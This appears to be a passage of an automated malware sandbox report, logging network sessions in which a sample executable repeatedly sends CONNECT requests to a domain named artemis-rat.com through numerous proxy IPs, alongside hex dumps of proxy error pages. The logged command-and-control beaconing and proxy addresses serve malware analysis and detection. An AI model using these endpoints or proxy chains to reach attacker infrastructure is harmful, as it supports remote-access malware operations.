                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.431041956 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.474886894 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:25.563524008 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:33.731142998 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:50.084501028 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1980192.168.2.555326218.65.6.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.401818991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1981192.168.2.55529945.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.401887894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1982192.168.2.555324185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402154922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1983192.168.2.555342191.243.46.30432413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402219057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202020884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217859983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.214389086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.048185110 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1984192.168.2.555261139.59.1.1431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402223110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.953927040 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1985192.168.2.55536191.189.177.18831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402472019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.723143101 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 